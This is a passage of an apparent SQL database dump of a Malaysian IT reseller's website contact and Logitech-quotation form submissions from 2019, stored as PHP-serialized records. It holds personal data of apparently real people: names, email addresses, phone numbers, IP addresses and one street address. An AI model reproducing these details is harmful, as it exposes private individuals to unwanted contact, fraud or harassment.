Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"p\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"hi i nak tanya u ada jual synology RS818+ and berapa harga\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-27 15:43:49','118.100.225.45','1'),(127,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Bryan Lee\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"bryan.lee@compasia.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126532307\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"CompAsia\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:54:\"We are looking for an e-signature collection software.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"23\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-28 11:05:50','115.133.102.85','1'),(128,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"azman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"emages7@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122599497\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"p\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"hi i nak tanya u ada jual synology RS818+ and berapa harga\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-28 14:27:09','118.100.225.45','1'),(129,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"azman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"emages7@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122599497\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"p\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"hi i nak tanya u ada jual synology RS818+ and berapa harga\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-29 11:00:53','118.100.225.45','1'),(130,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Mohammad Azuddin Said\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"azuddin@pakaratwork.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60133977161\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Pakaratwork SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"Neo Damansara, Jalan PJU8/1, Bandar Damansara Perdana, 47820 Petaling Jaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Logitech Group, Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-29 15:25:38','14.192.208.172','1'),(131,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"STEPHINA LUPANG\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"stephina@mampat.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126980067\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"MAMPAT FUTURE SDN. BHD.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech BCC950\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"PLEASE QUOTE FOR 1 UNIT\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-29 16:57:08','203.106.121.180','1'),(132,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"azman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"emages7@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122599497\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"p\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"hi i nak tanya u ada jual synology RS818+ and berapa harga\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-01 10:58:09','175.142.250.84','1'),(133,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Kiang Chua Tey\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"kiangchua.tey@franky.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"095661888\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Franky Construction Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Would like seeking for advise for conference setup\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-02 00:08:28','175.145.84.50','1'),(134,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"GUNALAN VILLU\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"gunalan.nvillu@asianpac.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182996888\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ASIANPAC HOLDINGS BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:79:\"Hi! we are looking for video conferencing facility. please contact me urgently.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-02 16:09:48','211.25.18.59','1'),(135,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation 